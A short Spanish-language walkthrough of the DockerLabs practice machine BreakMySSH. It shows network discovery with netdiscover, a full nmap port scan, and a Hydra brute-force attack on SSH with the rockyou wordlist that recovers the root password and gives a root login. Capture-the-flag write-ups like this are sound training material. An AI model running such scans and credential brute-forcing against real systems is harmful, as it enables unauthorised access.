Máquina BreakMySSH (Muy fácil)

Información

Puedes descargar esta máquina de Dockerlabs → BreakMySSH

DockerLabs

DockerLabs

Reconocimiento

Lo primero que vamos a hacer es descubrir en nuestra red la máquina que hemos instalado

netdiscover -r 172.17.0.0/24

Una vez reconocida la IP 172.17.0.3 tendríamos que comprobar si tiene alguna vulnerabilidad en alguno de sus puertos (se llama BreakMySSH) yo alguna pista creo que tengo ya 😆

Usaremos Nmap para localizar los puertos abiertos de nuestra IP con los siguientes atributos de Nmap y los guardaremos en un archivo llamado lookPorts

nmap -p- -sT --min-rate 5000 -vvv -n -Pn 172.17.0.3 -oG lookPorts

Mostraremos el archivo para ver qué puertos hemos encontrado

Bueno, como sospechábamos, el puerto 22 está abierto, así que por ahí podemos encontrar algo. Para SSH existe una herramienta llamada Hydra que es una herramienta de fuerza bruta a base de usuarios y contraseñas. Al tratarse de una máquina fácil vamos a probar directamente dado que no tenemos otro puerto ni más datos de donde sacar más información.

Explotación

sudo hydra -L /usr/share/wordlists/amass/all.txt -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.3 -t 4

Listo (en menos de 3 segundos, de ahí que la máquina sea muy fácil), ha sacado que la contraseña es estrella así que vamos a probar

ssh root@172.17.0.3

Listo, ya hemos entrado en la máquina con permisos de root.